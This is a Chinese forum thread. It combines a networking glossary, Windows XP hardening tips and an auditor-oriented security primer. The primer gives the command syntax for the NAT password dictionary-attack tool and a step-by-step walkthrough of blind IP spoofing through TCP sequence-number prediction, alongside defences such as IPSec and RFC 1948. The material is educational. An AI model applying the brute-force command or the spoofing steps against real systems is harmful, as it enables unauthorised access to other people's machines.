? TCP port (TCP端口)—与虚拟电路类似的一种功能,通过T C P端口,位于两个通信结
点或者设备上的单个进程之间可以进行通信。每个通信的进程都有自己的端口号,在有
多个进程同时进行通信的时候,可以使用多个端口。
? telco—地区的电话公司,如US We s t。
? Telecommunications Industry Association (通信工业联合会, TIA)—T I A是E


术语表(5)


I A中的建立
标准的一个实体,主要开发远程通信和布线标准。
? television frame (电视帧)—电视帧是一系列图片中用来模仿动作的一幅完整的图片。
? Te l n e t—一种T C P / I P应用协议,可以提供终端仿真。
? terminal (终端)—终端是具有监视器和键盘的设备,但对本地处理而言是没有C P U的。
终端与主机相连,处理过程均在主机上完成。
? terminal adapter (终端适配器, TA )—终端适配器是将计算机或传真机连接在I S D N线路
上的设备。终端适配器可将数字信号转变为可以在数字电话线路上发送的协议。
? terminal emulation (终端仿真)—用软件来使计算机(如P C )的行为类似于终端。
? time-division multiple access (时分多路访问技术)—这种交换方法通过划分时间槽(每
个时间槽对应一台设备,设备从中可以进行信号传输)使得多个设备可以在同一种通信
介质上进行通信。
? token ring (令牌环)—这是由I B M公司于7 0年代开发的一种访问方法,它仍然保留着主
要的L A N技术。这种传输方法在物理上采用星形拓扑结构,而在逻辑上采用环形拓扑结
构。虽然在令牌环网中,每一个结点也连接在中央集线器上,但包在结点到结点间进行
传输时就好像没有开始点和终止点一样。
? topology (拓扑结构)—拓扑结构是电缆上发送包所遵循的电缆的物理布局和逻辑路径。
? translation (转换)—转换是一种传输协议转变为另一种传输协议的方法。
? translational bridge (转换网桥)—转换网桥是使用不同传输协议的网络间的网桥,它可
以向网络传送适当的不同协议。
? Transmission Control Protocol (传输控制协议, TCP)—这是一种传输协议,属于T C P / I P
协议套的一部分,用于在网络软件应用进程之间建立通信会话,并且可以通过控制数据
流量做到可靠的端到端数据传输。
? Trivial File Transfer Protocol (普通文件传输协议, TFTP)—T C P / I P文件传输协议,用于
传输无盘工作站启动所使用的文件。
? trunking (中继)—在两个网络传输设备之间的两个或多个物理链接,它们组成一个集
合可当做一条线路使用,总的传输速率是每个链接传输速率的总和。
? twisted-pair cable (双绞线)—双绞线是一种柔性通信电缆,其中包含着绞在一起的成
对的绝缘铜线以减少E M I和R F I的干扰,双绞线的外部还覆盖着一层绝缘套管。
下载
? uninterruptible power supply (不间断电源, UPS)—在电源故障或电压不足时,提供快
速电池供电的设备,有时是在一个电子设备中,有时作为一个单独的设备。
? universal serial bus (通用串行总线, USB)—通用串行总线是为连接各种外设(如打印
机、调制解调器、磁带驱动器)而建立的标准,将要替代传统并行和串行端口的使用。
? unshielded twisted-pair cable ( 非屏蔽双绞线, UTP)—这是一种在绞在一起的成对的绝
缘线和外部套管间没有屏蔽的电缆。
? User Datagram Protocol (用户数据报协议, UDP)—一种使用I P的协议,它和T C P的位
置一样,可以提供低开销的无连接服务。
? U s e r-Network Interface(用户—网络接口, UNI)—一个AT M接口,用于终端结点到交换
机的连接。
V
? virtual circuit (虚拟电路)—虚拟电路是由O S I网络层为发送和接收数据而建立的逻辑
通信路径。
? virtual LAN (虚拟局域网, VLAN)—虚拟局域网是在子网组之外建立的逻辑网络,而
子网组是通过交换机和路由器上的智能软件建立并独立于物理网络拓扑结构的。
? virtual path identifier/virtual channel identifier ( 虚拟路径标识符/虚拟通道标识符,
V P I / V C I )— AT M信元中的一个编码,使得信元能够到达想要到达的输出接口。
W
? wavelength division multiplexing (波长分割多路转接器, WDM)—波长分割多路转接器
是一种用于光纤介质的交换技术,可以截取几个输入连接,并将其转化为在光纤电缆上
传送的光谱范围内的不同的波长。
? wide area network (广域网, WA N )—广域网是一种意义深远的网络系统,可以跨越极
大的物理空间。
X
? X . 2 5—一种老的非常可靠的分组交换协议,最高可以以2 . 0 4 8 M b p s的速率连接到远程
的网络上。X . 2 5协议定义了D T E和D C E之间的通信。
? X/Open XA—基于U N I X的系统所使用的一种开放数据库标准。
? Xerox Network System (施乐网络系统, XNS)— 一个由施乐公司在网络早期开发的用
于以太网通信的协议。










B19层 发表时间: 10-07-16 18:34

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
个人电脑安全


由于现在用xp的用户相对多一点,所以以下基本都是针对xp的,当然有很多都是通用的,由于考虑到新手,所以讲的都是基础的,好接受点。哪里不好的请直言。
好了,follow me


一:计算机个人密码

添加一个合法用户,尽量不使用管理员账号登陆。这里告诉大家一个小技巧,把管理员账号的名称(ADMINISTRATOR)改成一个不起眼的名字(控制面板-用户帐户里改)。然后建立一个受限的用户(名字设为admini),限制他的种种操作,并设置繁杂的密码,这样……不用说了吧(当别人费尽九牛二虎之力进来时发觉…………? 把它气死!!!!)
--------------snowchao
还有设置复杂的口令,更改有助于防止口令蠕虫轻易的进入系统。

二:禁用没用的服务


这是icool早期的作品,呵呵,相信很多人都看过了,不过对刚来的还是很有用的哦。
关闭了这些服务不仅增加了安全系数,而且可以使你的爱机提速
不过当你遇到禁用了某些服务后有些东西不能用了就马上去看看被禁用的服务的说明

三:关闭不用的端口

如果觉得下面的端口所对应的服务没用,那么就关了好了
下面是几个常见的端口的关闭方法

1、139端口的关闭
139端口是NetBIOS Session端口,用来文件和打印共享
关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。

2、445端口的关闭
修改注册表,添加一个键值
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为 0
这样就ok了

3、3389端口的关闭
xp:我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。

win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,
选中属性选项将启动类型改成手动,并停止该服务。

win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services
服务项,选中属性选项将启动类型改成手动,并停止该服务。

四:漏洞检测,补丁

下面是天网的一个检测个人系统漏洞的网址,大家可以去检测一下自己的系统 http://pfw.sky.net.cn/news/info/list.php?sessid=&sortid=17

还有瑞星杀毒软件也有检测系统漏洞的功能(打开瑞星-工具-系统漏洞扫描)
当发现漏洞后就要去堵漏洞了,接下来就是打补丁,不仅可以增强兼容性外,更重要的是堵上已发现的安全漏洞。但是不是打上所以的补丁就最好,最好当你下载前先看一下是什么内容的,如果是你已经关闭了服的务之类的补丁就不用下了。

下面是上海交大的下载页面,安全系数高点,可以下载系统未打的补丁 http://windowsupdate.sjtu.edu.cn/

五:杀毒软件和防火墙

要系统安全,防火墙是很重要的,当然,有了防火墙也不是没事了,还要记得定时升级杀毒软件杀毒。一般一新期一次差不多了。
建议不要装过多的防火墙和杀毒软件,这样可以加快启动,也可以避免某些冲突。下面的防火墙和杀毒软件是新手区推荐的 http://hackbase.com/bbs/viewthread.php?tid=34405

六:数据备份

系统还原是默认打开的,它会自动备分,当遇到不可解决的问题时,可以尝试一下系统还原,而不用重装系统。开始-运行输入msconfig在一般这项里有“开始系统还原一项”如果要还原就点这里了。



网络安全知识(1)

一旦黑客定位了你的网络,他通常会选定一个目标进行渗透。通常这个目标会是安全漏洞最多或是他拥有最多攻击工具的主机。非法入侵系统的方法有很多,你应当对这些方法引起注意。
  常见攻击类型和特征

  攻击特征是攻击的特定指纹。入侵监测系统和网络扫描器就是根据这些特征来识别和防范攻击的。下面简要回顾一些特定地攻击渗透网络和主机的方法。

  常见的攻击方法

  你也许知道许多常见的攻击方法,下面列出了一些:

  · 字典攻击:黑客利用一些自动执行的程序猜测用户命和密码,审计这类攻击通常需要做全面的日志记录和入侵监测系统(IDS)。

  · Man-in-the-middle攻击:黑客从合法的传输过程中嗅探到密码和信息。防范这类攻击的有效方法是应用强壮的加密。

  · 劫持攻击:在双方进行会话时被第三方(黑客)入侵,黑客黑掉其中一方,并冒充他继续与另一方进行会话。虽然不是个完全的解决方案,但强的验证方法将有助于防范这种攻击。

  · 病毒攻击:病毒是能够自我复制和传播的小程序,消耗系统资源。在审计过程中,你应当安装最新的反病毒程序,并对用户进行防病毒教育。

  · 非法服务:非法服务是任何未经同意便运行在你的操作系统上的进程或服务。你会在接下来的课程中学到这种攻击。

  · 拒绝服务攻击:利用各种程序(包括病毒和包发生器)使系统崩溃或消耗带宽。

  容易遭受攻击的目标

  最常遭受攻击的目标包括路由器、数据库、Web和FTP服务器,和与协议相关的服务,如DNS、WINS和SMB。本课将讨论这些通常遭受攻击的目标。

  路由器

  连接公网的路由器由于被暴露在外,通常成为被攻击的对象。许多路由器为便于管理使用SNMP协议,尤其是SNMPv1,成为潜在的问题。许多网络管理员未关闭或加密Telnet会话,若明文传输的口令被截取,黑客就可以重新配置路由器,这种配置包括关闭接口,重新配置路由跳计数等等。物理安全同样值得考虑。必须保证路由器不能被外人物理接触到进行终端会话。

  过滤Telnet

  为了避免未授权的路由器访问,你应利用防火墙过滤掉路由器外网的telnet端口和SNMP[161,162]端口

  技术提示:许多网络管理员习惯于在配置完路由器后将Telnet服务禁止掉,因为路由器并不需要过多的维护工作。如果需要额外的配置,你可以建立物理连接。

  路由器和消耗带宽攻击

  最近对Yahoo、e-Bay等电子商务网站的攻击表明迅速重新配置路由器的重要性。这些攻击是由下列分布式拒绝服务攻击工具发起的:

  · Tribal Flood Network(TFN)

  · Tribal Flood Network(TFN2k)

  · Stacheldraht(TFN的一个变种)

  · Trinoo(这类攻击工具中最早为人所知的)

  因为许多公司都由ISP提供服务,所以他们并不能直接访问路由器。在你对系统进行审计时,要确保网络对这类消耗带宽式攻击的反映速度。你将在后面的课程中学习如何利用路由器防范拒绝服务攻击。

  数据库

  黑客最想得到的是公司或部门的数据库。现在公司普遍将重要数据存储在关系型或面向对象的数据库中,这些信息包括:

  · 雇员数据,如个人信息和薪金情况。

  · 市场和销售情况。

  · 重要的研发信息。

  · 货运情况。

  黑客可以识别并攻击数据库。每种数据库都有它的特征。如SQL Server使用1433/1434端口,你应该确保防火墙能够对该种数据库进行保护。你会发现,很少有站点应用这种保护,尤其在网络内部。
服务器安全  WEB和FTP这两种服务器通常置于DMZ,无法得到防火墙的完全保护,所以也特别容易遭到攻击。Web和FTP服务通常存在的问题包括:

  · 用户通过公网发送未加密的信息;

  · 操作系统和服务存在众所周知的漏洞导致拒绝服务攻击或破坏系统;

  · 旧有操作系统中以root权限初始运行的服务,一旦被黑客破坏,入侵者便可以在产生的命令解释器中运行任意的代码。

  Web页面涂改

  近来,未经授权对Web服务器进行攻击并涂改缺省主页的攻击活动越来越多。许多企业、政府和公司都遭受过类似的攻击。有时这种攻击是出于政治目的。大多数情况下Web页面的涂改意味着存在这入侵的漏洞。这些攻击通常包括Man-in-the-middle攻击(使用包嗅探器)和利用缓冲区溢出。有时,还包括劫持攻击和拒绝服务攻击。

  邮件服务

  广泛使用的SMTP、POP3和IMAP一般用明文方式进行通信。这种服务可以通过加密进行验证但是在实际应用中通信的效率不高。又由于大多数人对多种服务使用相同的密码,攻击者可以利用嗅探器得到用户名和密码,再利用它攻击其它的资源,例如Windows NT服务器。这种攻击不仅仅是针对NT系统。许多不同的服务共享用户名和密码。你已经知道一个薄弱环节可以破坏整个的网络。FTP和SMTP服务通常成为这些薄弱的环节。

  与邮件服务相关的问题包括:

  · 利用字典和暴力攻击POP3的login shell;

  · 在一些版本中sendmail存在缓冲区溢出和其它漏洞;

  · 利用E-mail的转发功能转发大量的LJ信件

  名称服务

  攻击者通常把攻击焦点集中在DNS服务上。由于DNS使用UDP,而UDP连接又经常被各种防火墙规则所过滤,所以许多系统管理员发现将DNS服务器至于防火墙之后很困难。因此,DNS服务器经常暴露在外,使它成为攻击的目标。DNS攻击包括:
· 未授权的区域传输;


网络安全知识(2)

 · DNS 毒药,这种攻击是指黑客在主DNS服务器向辅DNS服务器进行区域传输时插入错误的DNS信息,一旦成功,攻击者便可以使辅DNS服务器提供错误的名称到IP地址的解析信息;

  · 拒绝服务攻击;

  其它的一些名称服务也会成为攻击的目标,如下所示:

  · WINS,“Coke”通过拒绝服务攻击来攻击没有打补丁的NT系统。

  · SMB服务(包括Windows的SMB和UNIX的Samba)这些服务易遭受Man-in-the-middle攻击,被捕获的数据包会被类似L0phtCrack这样的程序破解。

  · NFS和NIS服务。这些服务通常会遭受Man-in-the-middle方式的攻击。

  在审计各种各样的服务时,请考虑升级提供这些服务的进程。


  审计系统BUG

  作为安全管理者和审计人员,你需要对由操作系统产生的漏洞和可以利用的软件做到心中有数。早先版本的Microsoft IIS允许用户在地址栏中运行命令,这造成了IIS主要的安全问题。其实,最好的修补安全漏洞的方法是升级相关的软件。为了做到这些,你必须广泛地阅读和与其他从事安全工作的人进行交流,这样,你才能跟上最新的发展。这些工作会帮助你了解更多的操作系统上的特定问题。

  虽然大多数的厂商都为其产品的问题发布了修补方法,但你必须充分理解补上了哪些漏洞。如果操作系统或程序很复杂,这些修补可能在补上旧问题的同时又开启了新的漏洞。因此,你需要在实施升级前进行测试。这些测试工作包括在隔离的网段中验证它是否符合你的需求。当然也需要参照值得信赖的网络刊物和专家的观点。

  审计Trap Door和Root Kit

  Root kit是用木马替代合法程序。Trap Door是系统上的bug,当执行合法程序时却产生了非预期的结果。如老版本的UNIX sendmail,在执行debug命令时允许用户以root权限执行脚本代码,一个收到严格权限控制的用户可以很轻易的添加用户账户。

  虽然root kit通常出现在UNIX系统中,但攻击者也可以通过看起来合法的程序在Windows NT中置入后门。象NetBus,BackOrifice和Masters of Paradise等后门程序可以使攻击者渗透并控制系统。木马可以由这些程序产生。如果攻击者够狡猾,他可以使这些木马程序避开一些病毒检测程序,当然用最新升级的病毒检测程序还是可以发现它们的踪迹。在对系统进行审计时,你可以通过校验分析和扫描开放端口的方式来检测是否存在root kit等问题。

  审计和后门程序

  通常,在服务器上运行的操作系统和程序都存在代码上的漏洞。例如,最近的商业Web浏览器就发现了许多安全问题。攻击者通常知道这些漏洞并加以利用。就象你已经知道的RedButton,它利用了Windows NT的漏洞使攻击者可以得知缺省的管理员账号,即使账号的名称已经更改。后门(back door)也指在操作系统或程序中未记录的入口。程序设计人员为了便于快速进行产品支持有意在系统或程序中留下入口。不同于bug,这种后门是由设计者有意留下的。例如,像Quake和Doom这样的程序含有后门入口允许未授权的用户进入游戏安装的系统。虽然看来任何系统管理员都不会允许类似的程序安装在网络服务器上,但这种情况还是时有发生。

  从后门程序的危害性,我们可以得出结论,在没有首先阅读资料和向值得信赖的同事咨询之前不要相信任何新的服务或程序。在你进行审计时,请花费一些时间仔细记录任何你不了解它的由来和历史的程序。
  审计拒绝服务攻击

  Windows NT 易遭受拒绝服务攻击,主要是由于这种操作系统比较流行并且没有受到严格的检验。针对NT服务的攻击如此频繁的原因可以归结为:发展势头迅猛但存在许多漏洞。在审计Windows NT网络时,一定要花时间来验证系统能否经受这种攻击的考验。打补丁是一种解决方法。当然,如果能将服务器置于防火墙的保护之下或应用入侵监测系统的话就更好了。通常很容易入侵UNIX操作系统,主要因为它被设计来供那些技术精湛而且心理健康的人使用。在审计UNIX系统时,要注意Finger服务,它特别容易造成缓冲区溢出。

  缓冲区溢出

  缓冲区溢出是指在程序重写内存块时出现的问题。所有程序都需要内存空间和缓冲区来运行。如果有正确的权限,操作系统可以为程序分配空间。C和C++等编程语言容易造成缓冲区溢出,主要因为它们不先检查是否有存在的内存块就直接调用系统内存。一个低质量的程序会不经检查就重写被其它程序占用的内存,而造成程序或整个系统死掉,而留下的shell有较高的权限,易被黑客利用运行任意代码。

  据统计,缓冲区溢出是当前最紧迫的安全问题。要获得关于缓冲区溢出的更多信息,请访问Http://www-4.ibm.com/software/de ... verflows/index.heml
Telnet的拒绝服务攻击

  Windows中的Telnet一直以来都是网络管理员们最喜爱的网络实用工具之一,但是一个新的漏洞表明,在Windows2000中Telnet在守护其进程时,在已经被初始化的会话还未被复位的情况下很容易受到一种普通的拒绝服务攻击。Telnet连接后,在初始化的对话还未被复位的情况下,在一定的时间间隔之后,此时如果连接用户还没有提供登录的用户名及密码,Telnet的对话将会超时。直到用户输入一个字符之后连接才会被复位。如果恶意用户连接到Windows2000的Telnet守护进程中,并且对该连接不进行复位的话,他就可以有效地拒绝其他的任何用户连接该Telnet服务器,主要是因为此时Telnet的客户连接数的最大值是1。在此期间任何其他试图连接该Telnet服务器的用户都将会收到如下错误信息:

  Microsoft Windows Workstation allows only 1 Telnet Client LicenseServer has closed connection

  察看“列出当前用户”选项时并不会显示超时的会话,因为该会话还没有成功地通过认证。

  Windows NT的TCP port 3389存在漏洞

  Windows NT Server 4.0 终端服务器版本所作的 DoS 攻击。这个安全性弱点让远端使用者可以迅速的耗尽 Windows NT Terminal Server 上所有可用的内存,造成主机上所有登陆者断线,并且无法再度登入。

  说明:

  1. Windows NT Server 4.0 终端服务器版本在 TCP port 3389 监听终端连接 (terminal connection),一旦某个 TCP 连接连上这个端口, 终端服务器会开始分配系统资源,以处理新的客户端连接,并作连接的认证工作。

  2. 此处的漏洞在于:在认证工作完成前,系统需要拨出相当多的资源去处理新的连 接,而系统并未针对分配出去的资源作节制。因此远端的攻击者可以利用建立大 量 TCP 连接到 port 3389 的方法,造成系统存储体配置达到饱和。

  3. 此时服务器上所有使用者连接都会处于超时状态,而无法继续连接到服务器上,远端攻击者仍能利用一个仅耗用低频宽的程式,做出持续性的攻击,让此 服务器处於最多记忆体被耗用的状态,来避免新的连接继续产生。

  4. 在国外的测试报告中指出,长期持续不断针对此项弱点的攻击,甚至可以导致服务器持续性当机,除非重新开机,服务器将无法再允许新连接的完成。

  解决方案:

  1. 以下是修正程序的网址:

  ftp://ftp.microsoft.com/bussys/w ... sa/NT40tse/hotfixes postSP4/Flood-fix/

  [注意]:因为行数限制,上面网址请合并为一行。

  2. 更详细资料请参考 Microsoft 网站的网址:

  http://www.microsoft.com/security/bulletins/ms99-028.asp.

  防范拒绝服务攻击

  你可以通过以下方法来减小拒绝服务攻击的危害:

  · 加强操作系统的补丁等级。

  · 如果有雇员建立特定的程序,请特别留意代码的产生过程。

  · 只使用稳定版本的服务和程序。

  审计非法服务,特洛伊木马和蠕虫

  非法服务开启一个秘密的端口,提供未经许可的服务,常见的非法服务包括:

  · NetBus

  · BackOrifice 和 BackOrifice 2000

  · Girlfriend

  · 冰河2.X

  · 秘密的建立共享的程序

  许多程序将不同的非法服务联合起来。例如,BackOrifice2000允许你将HTTP服务配置在任意端口。你可以通过扫描开放端口来审计这类服务,确保你了解为什么这些端口是开放的。如果你不知道这些端口的用途,用包嗅探器和其它程序来了解它的用途。

  技术提示:不要混淆非法服务和木马。木马程序通常包含非法服务,而且,木马程序还可以包含击键记录程序,蠕虫或病毒。

  特洛伊木马

  特洛伊木马是在执行看似正常的程序时还同时运行了未被察觉的有破坏性的程序。木马通常能够将重要的信息传送给攻击者。攻击者可以把任意数量的程序植入木马。例如,他们在一个合法的程序中安放root kit或控制程序。还有一些通常的策略是使用程序来捕获密码和口令的hash值。类似的程序可以通过E-mail把信息发送到任何地方。

  审计木马

  扫描开放端口是审计木马攻击的途径之一。如果你无法说明一个开放端口用途,你也许就检测到一个问题。所以,尽量在你的系统上只安装有限的软件包,同时跟踪这些程序和服务的漏洞。许多TCP/IP程序动态地使用端口,因此,你不应将所有未知的端口都视为安全漏洞。在建立好网络基线后,你便可以确定哪些端口可能存在问题了。

  蠕虫

  Melissa病毒向我们展示了TCP/IP网络是如何容易遭受蠕虫攻击的。在你审计系统时,通常需要配置防火墙来排除特殊的活动。防火墙规则的设置超出了本术的范围。但是,作为审计人员,你应当对建议在防火墙上过滤那些从不信任的网络来的数据包和端口有所准备。

  蠕虫靠特定的软件传播。例如,在2000年三月发现的Win32/Melting.worm蠕虫只能攻击运行Microsoft Outlook程序的Windows操作系统。这种蠕虫可以自行传播,瘫痪任何种类的Windows系统而且使它持续地运行不稳定。








网络安全知识(3)

结合所有攻击定制审计策略
  攻击者有两个共同的特点。首先,他们将好几种不同的方法和策略集中到一次攻击中。其次,他们在一次攻击中利用好几种系统。综合应用攻击策略可以增强攻击的成功率。同时利用好几种系统使他们更不容易被捕获。

  例如,在实施IP欺骗时,攻击者通常会先实施拒绝服务攻击以确保被攻击主机不会建立任何连接。大多数使用Man-in-the-middle的攻击者会先捕获SMB的密码,再使用L0phtCrack这样的程序进行暴力破解攻击。

  渗透策略

  你已经了解到那些网络设备和服务是通常遭受攻击的目标和黑客活动的攻击特征。现在,请参考下列的一些场景。它们将有助于你在审计过程中关注那些设备和服务。请记住,将这些攻击策略结合起来的攻击是最容易成功的。

  物理接触

  如果攻击者能够物理接触操作系统,他们便可以通过安装和执行程序来使验证机制无效。例如,攻击者可以重启系统,利用其它启动盘控制系统。由于一种文件系统可以被另一种所破坏,所以你可以使用启动盘获得有价值的信息,例如有管理权限的账号。

  物理攻击的简单例子包括通过重新启动系统来破坏Windows95或98的屏幕锁定功能。更简单的物理攻击是该系统根本就没有进行屏幕锁定。

  操作系统策略

  近来,美国白宫的Web站点(http://www.whitehouse.gov)被一个缺乏经验的攻击者黑掉。攻击者侦查出该Web服务器(www1.whitehouse.gov)运行的操作系统是Solaris 7。虽然Solaris 7被成为艺术级的操作系统,但管理员并没有改变系统的缺省设置。虽然该站点的管理员设置了tripwire,但攻击者还是使用phf/ufsrestore命令访问了Web服务器。

  较弱的密码策略

  上面白宫网站被黑的例子可能是由于该系统管理员使用FTP来升级服务器。虽然使用FTP来更新网站并没有错,但大多数FTP会话使用明文传输密码。很明显,该系统管理员并没有意识到这种安全隐患。又由于大多数系统管理员在不同的服务上使用相同的密码,这使攻击者能够获得系统的访问权。更基本的,你可以保证/etc/passwd文件的安全。

  NetBIOS Authentication Tool(NAT)

  当攻击者以WindowsNT为目标时,他们通常会使用NetBIOS Authentication Tool(NAT)来测试弱的口令。这个程序可以实施字典攻击。当然它也有命令行界面,这种界面的攻击痕迹很小。而且命令行界面的程序也很好安装和使用。在使用NAT时,你必须指定三个文本文件和IP地址的范围。当然,你也可以指定一个地址。NAT使用两个文本文件来实施攻击而第三个来存储攻击结果。第一个文本文件包含一个用户列表,第二个文件中是你输入的猜测密码。

  当使用命令行版本时,语法格式为:

   nat –u username.txt –p passwordlist.txt –o outputfile.txt

  即使服务器设置了密码的过期策略和锁定,攻击者还是可以利用NAT反复尝试登录来骚扰管理员。通过简单地锁定所有已知的账号,攻击者会极大地影响服务器的访问,这也是一些系统管理员不强行锁定账号的原因。

  较弱的系统策略

  到此为止,你已经学习了一些外部攻击。然而,对于管理员来说最紧迫的是大多数公司都存在不好的安全策略。如果安全策略很弱或干脆没有安全策略,通常会导致弱的密码和系统策略。通常,公司并不采取简单的预防措施,比如需要非空的或有最小长度要求的密码。忽略这些限制会给攻击者留下很大的活动空间。

  审计文件系统漏洞

  不论你的操作系统采取何种文件系统(FAT,NTFS或NFS),每种系统都有它的缺陷。例如,缺省情况下NTFS在文件夹和共享创建之初everyone组可完全控制。由于它是操作系统的组成部分(Windows NT),因此也成为许多攻击的目标。NFS文件系统可以共享被远程系统挂接,因此这也是攻击者入侵系统的途径之一。

  IP欺骗和劫持:实例

  IP欺骗是使验证无效的攻击手段之一,也是如何组合攻击策略攻击网络的典型实例。IP欺骗利用了Internet开放式的网络设计和传统的建立在UNIX操作系统之间信任关系。主要的问题是使用TCP/IP协议的主机假设所有从合法IP地址发来的数据包都是有效的。攻击者可以利用这一缺陷,通过程序来发送虚假的IP包,从而建立TCP连接,攻击者可以使一个系统看起来象另一个系统。

  许多UNIX操作系统通过rhosts和rlogin在非信任的网络上(如Internet)建立信任的连接。这种传统的技术是流行的管理工具并减轻了管理负担。通常,这种系统由于把UNIX的验证机制和IP地址使用相结合从而提供了适当的安全。然而,这种验证机制是如此的独立于IP地址不会被伪造的假设,以至于很容易被击破。

  Non-blind spoofing 和Blind spoofing

  Non-blind spoofing是指攻击者在同一物理网段上操纵连接。Blind spoofing是指攻击者在不同的物理网段操纵连接。后者在实施上更困难,但也时常发生。

  进行IP欺骗的攻击者需要一些程序,包括:

  · 一个包嗅探器

  · 一个能够同时终止TCP连接、产生另一个TCP连接、进行IP 伪装的程序

  IP欺骗涉及了三台主机。像先前分析的那样,使用验证的服务器必须信任和它建立连接的主机。如果缺乏天生的安全特性,欺骗是非常容易的。

  思考下列的场景,有三台主机分别是A,B和C。A使用TCP SYN连接与合法用户B初始一个连接。但是B并没有真正参与到这次连接中,因为C已经对B实施了拒绝服务攻击。所以,虽然A认为是在与B对话,但实际上是与C对话。IP欺骗实际上组合了几种攻击手法包括对系统实施了拒绝服务攻击,还包括利用验证技术。

  作为审计人员,你不应该说服管理员终止这种信任关系,相反,你应当建议使用防火墙规则来检测有问题的包。
TCP/IP序列号生成方法

  TCP的Initial Sequence Number(ISN)的预测



  正常的TCP连接基于一个三次握手(3-way handshake),一个客户端(Client)向服务器(Server)发送一个初始化序列号ISNc, 随后,服务器相应这个客户端ACK(ISNc),并且发送自己的初始化序列号ISNs,接着,客户端响应这个ISNs(如下图),三次握手完成。

   C ---〉S: (ISNc)

   S ---〉C: ACK(ISNc)+ ISNs

   C ---〉S: ACK(ISNs)

   C ---〉S: data

   and / or

   S ---〉C: data

  下面,我以Windows2000 Advanced Server为例,来说一下两台主机是如何进行三次握手。

  我们可以看到:

  1) Smartboy首先发送一个seq:32468329的包给服务器202.116.128.6。

  2) 然后, 202.116.128.6响应主机Smartboy, 它送给Smartboy自己的

   seq:3333416325 而且响应Smartboy的ack:3240689240。

  3) Smartboy再响应服务器202.116.128.6, seq:3240689240, ack:3333416326。

   三次握手完毕,两台几建立起连接。

   可以看出,在三次握手协议中,Clinet一定要监听服务器发送过来的ISNs, TCP使用的sequence number是一个32位的计数器,从0-4294967295。TCP为每一个连接选择一个初始序号ISN,为了防止因为延迟、重传等扰乱三次握手,ISN不能随便选取,不同系统有不同算法。理解TCP如何分配ISN以及ISN随时间变化的规律,对于成功地进行IP欺骗攻击很重要。

  在Unix系统里,基于远程过程调用RPC的命令,比如rlogin、rcp、rsh等等,根据/etc/hosts.equiv以及$HOME/.rhosts文件进行安全校验,其实质是仅仅根据源IP地址进行用户身份确认,以便允许或拒绝用户RPC。这就给与了那些攻击者进行IP地址欺骗的机会。

   让我们看X是如何冒充T来欺骗S,从而建立一个非法连接 :

   X---->S: SYN(ISNx ) , SRC = T

   S---->T: SYN(ISNs ) , ACK(ISNT) (*)

   X---->S: ACK(ISNs+1 ) , SRC = T (**)

   X---->S: ACK(ISNs +1) , SRC = T, 攻击命令(可能是一些特权命令)

   但是,T必须要在第(**)中给出ISNs, 问题是ISNs在第(*)步中发给了T(X当然很难截取到),幸运的是,TCP协议有一个约定: ISN变量每秒增加250,000次,这个增加值在许多版本比较旧的操作系统中都是一个常量,在FreeBSD4.3中是125000次每秒,这就给X一个可乘之机。















网络安全知识(4)

看一下X是如何猜出ISNs : 

   a、首先, X发送一个SYN包来获取服务器现在的ISNs

     X ---〉S: (ISNx)

     S ---〉X: ACK(ISNx)+ ISNs# (1)

   b、紧接着,X冒充T向服务器发送SYN包

        X ---〉S: SYN(ISNx ) , SRC = T (2)

   c、于是,服务器发出一个响应包给T(这个包X是收不到的)

     S ---〉T: SYN(ISNs$) , ACK(ISNT ) (3)

   d、X计算ISNs$:

       ISNs$ = ISNs# + RTT×Increment of ISN (4)

  其中,RTT(Round Trip Time),是一个包往返X和S所用的时间,可以通过Ping 来得到。



  上图显示了round trip times (RTT) 大概是0。

  Increment of ISN是协议栈的初始序列号每秒钟增加的值,以Unix为例,当没有外部连接发生时,服务器的ISN每秒增加128,000,有连接的时候,服务器的ISN每秒增加64,000。

   e、于是,

    X ---> S : ACK(ISNs$)   (冒充可信主机成功了)

    X ---> S : 恶意的命令或窃取机密消息的命令

  在评价以下的解决方案时有几点要注意:

  1.该解决方案是否很好地满足TCP的稳定性和可操作性的要求?
  2.该解决方案是否容易实现?
  3.该解决方案对性能的影响如何?
  4.该解决方案是否经得起时间的考验?

  以下的几种方案各有各的优点和缺点,它们都是基于增强ISN生成器的目标提出的。

  配置和使用密码安全协议

  TCP的初始序列号并没有提供防范连接攻击的相应措施。TCP的头部缺少加密选项用于强加密认证,于是,一种叫做IPSec的密码安全协议的技术提出了。IPSec提供了一种加密技术(End to end cryptographic),使系统能验证一个包是否属于一个特定的流。这种加密技术是在网络层实现的。其它的在传输层实现的解决方案(如SSL/TLS和SSH1/SSH2), 只能防止一个无关的包插入一个会话中,但对连接重置(拒绝服务)却无能为力,原因是因为连接处理是发生在更低的层。IPSec能够同时应付着两种攻击(包攻击和连接攻击)。它直接集成在网络层的安全模型里面。

  上面的解决方案并不需要对TCP协议做任何得修改,RFC2385(“基于TCP MD5签名选项的BGP会话保护)和其他的技术提供了增加TCP头部的密码保护,但是,却带来了收到拒绝服务攻击和互操作性和性能方面的潜在威胁。使用加密安全协议有几个优于其它方案的地方。TCP头部加密防止了Hijacking和包扰乱等攻击行为,而TCP层仍然能够提供返回一个简单增加ISN的机制,使方案提供了最大程度的可靠性。但实现IPSec非常复杂,而且它需要客户机支持,考虑到可用性,许多系统都选择使用RFC 1948。

  使用RFC1948

  在RFC1948中,Bellovin提出了通过使用4-tuples的HASH单向加密函数,能够使远程攻击者无从下手(但不能阻止同一网段的攻击者通过监听网络上的数据来判断ISN)。

  Newsham 在他的论文 [ref_newsham]中提到:

  RFC 1948 [ref1]提出了一种不容易攻击(通过猜测)的TCP ISN的生成方法。此方法通过连接标识符来区分序列号空间。每一个连接标识符由本地地址,本地端口,远程地址,远程端口来组成,并由一个函数计算标识符分的序列号地址空间偏移值(唯一)。此函数不能被攻击者获得,否则,攻击者可以通过计算获得ISN。于是,ISN就在这个偏移值上增加。ISN的值以这种方式产生能够抵受上面提到的对ISN的猜测攻击。

